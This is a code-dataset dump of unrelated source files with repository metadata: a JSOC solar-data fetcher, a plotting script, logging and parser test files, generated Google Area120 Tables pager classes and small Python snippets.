adcb6ef11d8e4fb4099caac4ecb3edd5f623aa6c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
# coding: utf-8
# only run once!
# Creates a CSV with 2011's feature data.
# Source series: hmi.sharp_720s from JSOC:
# http://jsoc.stanford.edu/doc/data/hmi/sharp/sharp.htm
import pandas as pd
import drms  # https://pypi.org/project/drms/

# SHARP keywords requested for every record (identical to the original queries).
_KEYS = ('T_REC, HARPNUM, NOAA_AR, TOTUSJH, TOTUSJZ, SAVNCPP, USFLUX, ABSNJZH, '
         'TOTPOT, SIZE_ACR, NACR, MEANPOT, SIZE, MEANJZH, SHRGT45, MEANSHR, '
         'MEANJZD, MEANALP, MEANGBT, MEANGAM, MEANGBZ, MEANGBH, NPIX')


def get_2011_Features():
    """Compile the 2011 feature dataframe and write it to create_2011_features.csv.

    Multiple queries are needed due to the JSOC record-return limit, so the
    year is fetched in 52 consecutive 7-day windows (2011.01.01 through
    2011.12.24, matching the original hand-written queries) plus a final
    1-day window for 2011.12.31.

    Returns:
        The assembled pandas DataFrame (also written to disk as
        'create_2011_features.csv').
    """
    h = drms.Client()
    frames = []
    # 52 windows of 7 days each: 2011-01-01 + 51*7d ends at 2011-12-24.
    for start in pd.date_range('2011-01-01', periods=52, freq='7D'):
        ds = 'hmi.sharp_720s[][{}_TAI/7d]'.format(start.strftime('%Y.%m.%d'))
        frames.append(h.query(ds, key=_KEYS))
    # Final 1-day window covering the last day of the year.
    frames.append(h.query('hmi.sharp_720s[][2011.12.31_TAI/1d]', key=_KEYS))
    # DataFrame.append was removed in pandas 2.0; concat is the supported way.
    # Indices are left as returned per chunk, matching the original append calls.
    f_dataframe = pd.concat(frames)
    f_dataframe.to_csv('create_2011_features.csv')
    return f_dataframe
| 87.781421
| 252
| 0.728523
| 2,400
| 16,064
| 4.719167
| 0.048333
| 0.09359
| 0.057213
| 0.046795
| 0.969186
| 0.969186
| 0.969186
| 0.969186
| 0.966979
| 0.964683
| 0
| 0.05344
| 0.112363
| 16,064
| 182
| 253
| 88.263736
| 0.740865
| 0.027764
| 0
| 0.464286
| 0
| 0.473214
| 0.775806
| 0.120395
| 0
| 0
| 0
| 0
| 0
| 1
| 0.008929
| false
| 0
| 0.017857
| 0
| 0.026786
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
b22a8b48e7ad86f3238fd2c1c85183d6a42e903f
| 3,892
|
py
|
Python
|
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
read_log.py
|
NagisaZj/ac-teach
|
481811d5c80d0dbee54f16c063b4ea3262b82050
|
[
"MIT"
] | null | null | null |
import numpy as np
import matplotlib.pyplot as plt
import csv
import pandas
def smooth(data, smooth_range):
    """Trailing moving average along the last axis of a 2-D array.

    Column i is the mean of the last ``smooth_range`` columns up to and
    including i (or of the first i + 1 columns while fewer are available).

    Args:
        data: 2-D array-like of shape (series, samples).
        smooth_range: window length (number of trailing samples averaged).

    Returns:
        Float ndarray of the same shape with each column replaced by its
        trailing-window mean.
    """
    data = np.asarray(data)
    # Accumulate in float: np.zeros_like(data) would inherit an integer dtype
    # for integer input and silently truncate the averages on assignment.
    new_data = np.zeros(data.shape, dtype=float)
    for i in range(data.shape[-1]):
        if i < smooth_range:
            new_data[:, i] = np.sum(data[:, :i + 1], axis=1) / (i + 1)
        else:
            new_data[:, i] = np.sum(data[:, i - smooth_range + 1:i + 1], axis=1) / smooth_range
    return new_data
def read_csv(paths=None):
    """Load monitor CSVs and return smoothed metrics per file.

    Args:
        paths: iterable of CSV file paths (pandas-readable monitor logs with
            'r', 'l', 't' and 'success' columns). Defaults to no files.

    Returns:
        A list with one entry per path: [smoothed reward, episode lengths,
        timestamps, smoothed success rate].
    """
    # Avoid the mutable-default-argument pitfall of `paths=[]`.
    if paths is None:
        paths = []
    datas = []
    for p in paths:
        with open(p, 'r') as f:
            data = pandas.read_csv(f)
        print(data.keys())
        w = []
        # Series no longer supports 2-D indexing (s[None, :]); go through numpy
        # to get the (1, n) array that smooth() expects.
        w.append(smooth(data['r'].to_numpy()[None, :], 100)[0])
        w.append(data['l'])
        w.append(data['t'])
        w.append(smooth(data['success'].to_numpy()[None, :], 100)[0])
        datas.append(w)
    return datas
# Earlier experiments loaded many other seeds' monitor files here, repeatedly
# overwriting d1/d2 before use; only the final pair of assignments ever
# reached the plot, so just load those.
# d1: evaluation-time metrics, d2: training-time metrics (seed 31).
d1 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_31/gym_eval.monitor2.csv'])
d2 = read_csv(['/data2/zj/ac-teach/logs/MetaWorldEnv-v0/efficiency_partial_complete_suboptimal_ours/seed_31/monitor2.csv'])

plt.figure()
# One logged point every 500 environment steps — presumably the eval interval;
# TODO confirm against the training config.
plt.plot(np.arange(d1[0][0].shape[0]) * 500, d1[0][0], label='Push, Push Source, Test')
plt.plot(np.arange(d2[0][0].shape[0]) * 500, d2[0][0], color='r', label='Push, Push Source, Train')
plt.legend()
plt.show()
| 55.6
| 144
| 0.752312
| 616
| 3,892
| 4.512987
| 0.144481
| 0.057914
| 0.090647
| 0.105755
| 0.792806
| 0.777698
| 0.777698
| 0.777698
| 0.764029
| 0.763309
| 0
| 0.046395
| 0.080678
| 3,892
| 69
| 145
| 56.405797
| 0.730576
| 0.237667
| 0
| 0.044444
| 0
| 0.333333
| 0.572444
| 0.552471
| 0
| 0
| 0
| 0
| 0
| 1
| 0.044444
| false
| 0
| 0.088889
| 0
| 0.177778
| 0.022222
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
b23343e83e6046a2c1f8a3f7cc9bc81900134114
| 220
|
py
|
Python
|
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | null | null | null |
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | null | null | null |
browser/Python site-packages/pyshark/__init__.py
|
lightnarcissus/TextWeb
|
7a67aede097a8e3a328edd539672cb0c777d1fde
|
[
"Apache-2.0"
] | 1
|
2019-02-15T08:18:41.000Z
|
2019-02-15T08:18:41.000Z
|
from pyshark.capture.live_capture import LiveCapture
from pyshark.capture.file_capture import FileCapture
from pyshark.capture.remote_capture import RemoteCapture
from pyshark.capture.inmem_capture import InMemCapture
| 55
| 57
| 0.881818
| 28
| 220
| 6.785714
| 0.428571
| 0.231579
| 0.378947
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.081818
| 220
| 4
| 58
| 55
| 0.940594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
b2760ec851740beb70f30248119233b3691d0adb
| 161
|
py
|
Python
|
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
tests/parser/aggregates.count.boundguards.1.test.py
|
veltri/DLV2
|
944aaef803aa75e7ec51d7e0c2b0d964687fdd0e
|
[
"Apache-2.0"
] | null | null | null |
# Parser regression test: #count aggregate with a bound guard (X < #count{...}).
# The parser is expected to echo the program unchanged, so `output` is
# identical to `input`.
input = """
a(0).
b(1).
b(2).
b(3).
okay(X) :- a(X), X < #count{V : b(V)}.
"""
output = """
a(0).
b(1).
b(2).
b(3).
okay(X) :- a(X), X < #count{V : b(V)}.
"""
| 9.470588
| 38
| 0.36646
| 36
| 161
| 1.638889
| 0.333333
| 0.067797
| 0.101695
| 0.135593
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0.813559
| 0
| 0.062992
| 0.21118
| 161
| 16
| 39
| 10.0625
| 0.401575
| 0
| 0
| 0.857143
| 0
| 0
| 0.807453
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
a23d5910eab0f106406fe6814df7e124ecb7870e
| 1,968
|
py
|
Python
|
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
05_rotating_test.py
|
AlanCLo/python_logging_ref
|
8f032cfaa747a4907be92ca84b53ed47400d913c
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
"""Demo of RotatingFileHandler: a 300-byte cap with three backups, so
repeated runs cycle output through rotating.log, rotating.log.1, .2 and .3."""
import logging
from logging.handlers import RotatingFileHandler

log = logging.getLogger('test')
log.setLevel(logging.DEBUG)  # Max output

# Ref: https://docs.python.org/2/library/logging.handlers.html#rotatingfilehandler
rotating_handler = RotatingFileHandler('rotating.log', maxBytes=300, backupCount=3)
rotating_handler.setFormatter(logging.Formatter('%(filename)s: %(message)s'))
log.addHandler(rotating_handler)

# Output 200 bytes: four identical records instead of four copy-pasted calls.
# (The unused `import sys` from the original was dropped.)
for _ in range(4):
    log.info("1234567890123456789012345678")  # This line is 50 bytes

# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 200B 28 Mar 20:59 rotating.log
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 150B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 100B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 50B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
# $ ./05_rotating_test.py && ls -lh rotating.log*
# -rw-r--r-- 1 200B 28 Mar 20:59 rotating.log
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.1
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.2
# -rw-r--r-- 1 250B 28 Mar 20:59 rotating.log.3
#
| 35.781818
| 83
| 0.668191
| 349
| 1,968
| 3.724928
| 0.17192
| 0.211538
| 0.055385
| 0.069231
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0.708462
| 0
| 0.202694
| 0.170224
| 1,968
| 54
| 84
| 36.444444
| 0.593386
| 0.707317
| 0
| 0.333333
| 0
| 0
| 0.283333
| 0.207407
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a25680d07d4ad54482a0d27eab64404eaab1acb9
| 15,445
|
py
|
Python
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 7
|
2021-02-21T10:39:41.000Z
|
2021-12-07T07:31:28.000Z
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 6
|
2021-02-02T23:46:11.000Z
|
2021-11-15T01:46:02.000Z
|
google/area120/tables/v1alpha1/area120-tables-v1alpha1-py/google/area120/tables_v1alpha1/services/tables_service/pagers.py
|
googleapis/googleapis-gen
|
d84824c78563d59b0e58d5664bfaa430e9ad7e7a
|
[
"Apache-2.0"
] | 4
|
2021-01-28T23:25:45.000Z
|
2021-08-30T01:55:16.000Z
|
# -*- coding: utf-8 -*-
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from typing import Any, AsyncIterator, Awaitable, Callable, Sequence, Tuple, Optional, Iterator
from google.area120.tables_v1alpha1.types import tables
class ListTablesPager:
    """A pager for iterating through ``list_tables`` requests.

    Thin wrapper around an initial
    :class:`google.area120.tables_v1alpha1.types.ListTablesResponse` whose
    ``__iter__`` walks the ``tables`` field, transparently issuing further
    ``ListTables`` requests whenever another page token is present.

    All the usual :class:`google.area120.tables_v1alpha1.types.ListTablesResponse`
    attributes are available on the pager. If multiple requests are made, only
    the most recent response is retained, and thus used for attribute lookup.
    """
    def __init__(self,
            method: Callable[..., tables.ListTablesResponse],
            request: tables.ListTablesRequest,
            response: tables.ListTablesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListTablesRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListTablesResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        self._request = tables.ListTablesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes fall through to the most recent response.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterator[tables.ListTablesResponse]:
        """Yield each response page, fetching the next while a token remains."""
        current = self._response
        yield current
        while current.next_page_token:
            self._request.page_token = current.next_page_token
            current = self._method(self._request, metadata=self._metadata)
            self._response = current
            yield current

    def __iter__(self) -> Iterator[tables.Table]:
        for page in self.pages:
            for table in page.tables:
                yield table

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListTablesAsyncPager:
    """A pager for iterating through ``list_tables`` requests.

    Thin wrapper around an initial
    :class:`google.area120.tables_v1alpha1.types.ListTablesResponse` whose
    ``__aiter__`` walks the ``tables`` field, transparently issuing further
    ``ListTables`` requests whenever another page token is present.

    All the usual :class:`google.area120.tables_v1alpha1.types.ListTablesResponse`
    attributes are available on the pager. If multiple requests are made, only
    the most recent response is retained, and thus used for attribute lookup.
    """
    def __init__(self,
            method: Callable[..., Awaitable[tables.ListTablesResponse]],
            request: tables.ListTablesRequest,
            response: tables.ListTablesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiates the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListTablesRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListTablesResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        self._request = tables.ListTablesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes fall through to the most recent response.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterator[tables.ListTablesResponse]:
        """Yield each response page, awaiting the next while a token remains."""
        current = self._response
        yield current
        while current.next_page_token:
            self._request.page_token = current.next_page_token
            current = await self._method(self._request, metadata=self._metadata)
            self._response = current
            yield current

    def __aiter__(self) -> AsyncIterator[tables.Table]:
        async def _flatten():
            async for page in self.pages:
                for item in page.tables:
                    yield item
        return _flatten()

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListWorkspacesPager:
    """A pager for iterating through ``list_workspaces`` requests.

    Thin wrapper around an initial
    :class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse` whose
    ``__iter__`` walks the ``workspaces`` field, transparently issuing further
    ``ListWorkspaces`` requests whenever another page token is present.

    All the usual :class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse`
    attributes are available on the pager. If multiple requests are made, only
    the most recent response is retained, and thus used for attribute lookup.
    """
    def __init__(self,
            method: Callable[..., tables.ListWorkspacesResponse],
            request: tables.ListWorkspacesRequest,
            response: tables.ListWorkspacesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListWorkspacesRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListWorkspacesResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        self._request = tables.ListWorkspacesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes fall through to the most recent response.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterator[tables.ListWorkspacesResponse]:
        """Yield each response page, fetching the next while a token remains."""
        current = self._response
        yield current
        while current.next_page_token:
            self._request.page_token = current.next_page_token
            current = self._method(self._request, metadata=self._metadata)
            self._response = current
            yield current

    def __iter__(self) -> Iterator[tables.Workspace]:
        for page in self.pages:
            for workspace in page.workspaces:
                yield workspace

    def __repr__(self) -> str:
        return f'{self.__class__.__name__}<{self._response!r}>'
class ListWorkspacesAsyncPager:
    """An async pager for iterating through ``list_workspaces`` requests.

    Thinly wraps an initial
    :class:`google.area120.tables_v1alpha1.types.ListWorkspacesResponse` and
    exposes an ``__aiter__`` method that walks the ``workspaces`` field,
    transparently awaiting further ``ListWorkspaces`` requests whenever the
    server reports a ``next_page_token``.

    Attribute access is forwarded to the most recently fetched response, so
    all the usual response attributes stay available on the pager itself;
    only the latest response is retained.
    """

    def __init__(self,
            method: Callable[..., Awaitable[tables.ListWorkspacesResponse]],
            request: tables.ListWorkspacesRequest,
            response: tables.ListWorkspacesResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiates the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListWorkspacesRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListWorkspacesResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        # Copy the request so page_token mutations do not leak to the caller.
        self._request = tables.ListWorkspacesRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes are looked up on the latest response object.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterator[tables.ListWorkspacesResponse]:
        """Asynchronously yield every page, awaiting follow-ups on demand."""
        yield self._response
        while self._response.next_page_token:
            self._request.page_token = self._response.next_page_token
            self._response = await self._method(self._request, metadata=self._metadata)
            yield self._response

    def __aiter__(self) -> AsyncIterator[tables.Workspace]:
        async def _flatten():
            async for current_page in self.pages:
                for workspace in current_page.workspaces:
                    yield workspace
        return _flatten()

    def __repr__(self) -> str:
        return f'{type(self).__name__}<{self._response!r}>'
class ListRowsPager:
    """A pager for iterating through ``list_rows`` requests.

    Thinly wraps an initial
    :class:`google.area120.tables_v1alpha1.types.ListRowsResponse` and
    exposes an ``__iter__`` method that walks the ``rows`` field,
    transparently issuing further ``ListRows`` requests whenever the
    server reports a ``next_page_token``.

    Attribute access is forwarded to the most recently fetched response, so
    all the usual response attributes stay available on the pager itself;
    only the latest response is retained.
    """

    def __init__(self,
            method: Callable[..., tables.ListRowsResponse],
            request: tables.ListRowsRequest,
            response: tables.ListRowsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiate the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListRowsRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListRowsResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        # Copy the request so page_token mutations do not leak to the caller.
        self._request = tables.ListRowsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes are looked up on the latest response object.
        return getattr(self._response, name)

    @property
    def pages(self) -> Iterator[tables.ListRowsResponse]:
        """Lazily yield every response page, fetching follow-ups on demand."""
        yield self._response
        while self._response.next_page_token:
            self._request.page_token = self._response.next_page_token
            self._response = self._method(self._request, metadata=self._metadata)
            yield self._response

    def __iter__(self) -> Iterator[tables.Row]:
        # Flatten the pages into a single stream of Row messages.
        return (row for page in self.pages for row in page.rows)

    def __repr__(self) -> str:
        return f'{type(self).__name__}<{self._response!r}>'
class ListRowsAsyncPager:
    """An async pager for iterating through ``list_rows`` requests.

    Thinly wraps an initial
    :class:`google.area120.tables_v1alpha1.types.ListRowsResponse` and
    exposes an ``__aiter__`` method that walks the ``rows`` field,
    transparently awaiting further ``ListRows`` requests whenever the
    server reports a ``next_page_token``.

    Attribute access is forwarded to the most recently fetched response, so
    all the usual response attributes stay available on the pager itself;
    only the latest response is retained.
    """

    def __init__(self,
            method: Callable[..., Awaitable[tables.ListRowsResponse]],
            request: tables.ListRowsRequest,
            response: tables.ListRowsResponse,
            *,
            metadata: Sequence[Tuple[str, str]] = ()):
        """Instantiates the pager.

        Args:
            method (Callable): The method that was originally called, and
                which instantiated this pager.
            request (google.area120.tables_v1alpha1.types.ListRowsRequest):
                The initial request object.
            response (google.area120.tables_v1alpha1.types.ListRowsResponse):
                The initial response object.
            metadata (Sequence[Tuple[str, str]]): Strings which should be
                sent along with the request as metadata.
        """
        self._method = method
        # Copy the request so page_token mutations do not leak to the caller.
        self._request = tables.ListRowsRequest(request)
        self._response = response
        self._metadata = metadata

    def __getattr__(self, name: str) -> Any:
        # Unknown attributes are looked up on the latest response object.
        return getattr(self._response, name)

    @property
    async def pages(self) -> AsyncIterator[tables.ListRowsResponse]:
        """Asynchronously yield every page, awaiting follow-ups on demand."""
        yield self._response
        while self._response.next_page_token:
            self._request.page_token = self._response.next_page_token
            self._response = await self._method(self._request, metadata=self._metadata)
            yield self._response

    def __aiter__(self) -> AsyncIterator[tables.Row]:
        async def _flatten():
            async for current_page in self.pages:
                for row in current_page.rows:
                    yield row
        return _flatten()

    def __repr__(self) -> str:
        return f'{type(self).__name__}<{self._response!r}>'
| 40.116883
| 95
| 0.662933
| 1,702
| 15,445
| 5.810811
| 0.10517
| 0.058241
| 0.048028
| 0.068251
| 0.926188
| 0.922952
| 0.922952
| 0.922952
| 0.913549
| 0.913549
| 0
| 0.012634
| 0.251797
| 15,445
| 384
| 96
| 40.221354
| 0.843198
| 0.473098
| 0
| 0.801242
| 0
| 0
| 0.008238
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.167702
| false
| 0
| 0.012422
| 0.074534
| 0.310559
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a27ede8c67c9624a2abddd0e9520dc0d9d8818bc
| 83
|
py
|
Python
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 695
|
2019-05-06T23:49:37.000Z
|
2022-03-30T01:56:00.000Z
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 1,672
|
2019-05-06T21:09:38.000Z
|
2022-03-31T23:16:04.000Z
|
Python/Tests/TestData/Grammar/VarAnnotationIllegal.py
|
techkey/PTVS
|
8355e67eedd8e915ca49bd38a2f36172696fd903
|
[
"Apache-2.0"
] | 186
|
2019-05-13T03:17:37.000Z
|
2022-03-31T16:24:05.000Z
|
fob, oar: baz
fob: oar, baz
fob, oar: baz = 1
fob: oar, baz = 1
fob: oar = baz = 1
| 13.833333
| 18
| 0.578313
| 18
| 83
| 2.666667
| 0.222222
| 0.625
| 0.9375
| 0.625
| 1
| 1
| 0.625
| 0.625
| 0
| 0
| 0
| 0.04918
| 0.26506
| 83
| 5
| 19
| 16.6
| 0.737705
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
a28aefb5a0a2f7b18bd05f5a3c63864e001ccd02
| 206
|
py
|
Python
|
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
Nkechi Esomonu/Phase 1/Python Basic 1/Day 1/Day2/task 1.py
|
nkem1010/python-challenge-solutions
|
203cedc691094a83b110fc75764aac51dbbc1a03
|
[
"MIT"
] | null | null | null |
text="Twinkle, twinkle, little star,\n\tHow I wonder what you are!\n\t\tUp above the world so high,\n\t\tLike a diamond in the sky.\nTwinkle, twinkle, little star,\n\tHow I wonder what you are"
print(text)
| 103
| 193
| 0.742718
| 41
| 206
| 3.731707
| 0.609756
| 0.169935
| 0.222222
| 0.235294
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0.509804
| 0
| 0
| 0.135922
| 206
| 2
| 194
| 103
| 0.859551
| 0
| 0
| 0
| 0
| 0.5
| 0.898551
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0.5
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
a2c47c43655e5763046f3ed729b82a6f10e74966
| 45
|
py
|
Python
|
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | null | null | null |
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | null | null | null |
services/validators/__init__.py
|
rfukui/orign
|
7d0c22d5f006727ec33fa57efec75c7e762decc5
|
[
"Unlicense"
] | 1
|
2020-11-09T15:21:51.000Z
|
2020-11-09T15:21:51.000Z
|
from .input_validator import input_validator
| 22.5
| 44
| 0.888889
| 6
| 45
| 6.333333
| 0.666667
| 0.736842
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088889
